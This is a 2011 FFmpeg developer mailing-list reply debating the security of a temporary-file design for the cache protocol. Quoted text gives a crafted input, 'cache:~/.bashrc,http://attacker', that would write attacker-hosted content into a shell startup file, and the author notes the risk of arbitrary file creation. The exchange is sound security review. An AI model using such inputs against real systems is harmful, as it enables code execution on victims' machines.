[FFmpeg-devel] [RFC] av_tempfile()

Reimar Döffinger Reimar.Doeffinger at gmx.de
Sun Oct 16 21:30:10 CEST 2011

On Sun, Oct 16, 2011 at 09:27:12PM +0200, Reimar Döffinger wrote:
> > > "Features over security" IMO is not an acceptable behaviour, especially
> > > if it's not possible to disable it.
> > 
> > > Then force the user to specify a file name. That also works far better
> > > if you want the "download while watching" to work sanely.
> > 
> > I did that but that is exploitable
> > More precissely  cache:~/.bashrc,http://attacker as clickable link
> > or something along these lines as reference within another file
> > thus as a result of this i decided to use a temporary file, which is
> > what i commited.
> Whether allowing anyone to create files with arbitrary content (even if
> only in /tmp) is that great is questionable enough.

Note: if they were to somehow block /tmp it even allows creating files
with arbitrary content in the current directory.
Which is one step closer to allowing it to be executed (can't think of
way right now, Windows likes executing stuff in "." but does not like
things without the proper extensions, Linux wants execute flag and
usually does not look in ".", but still...)

More information about the ffmpeg-devel mailing list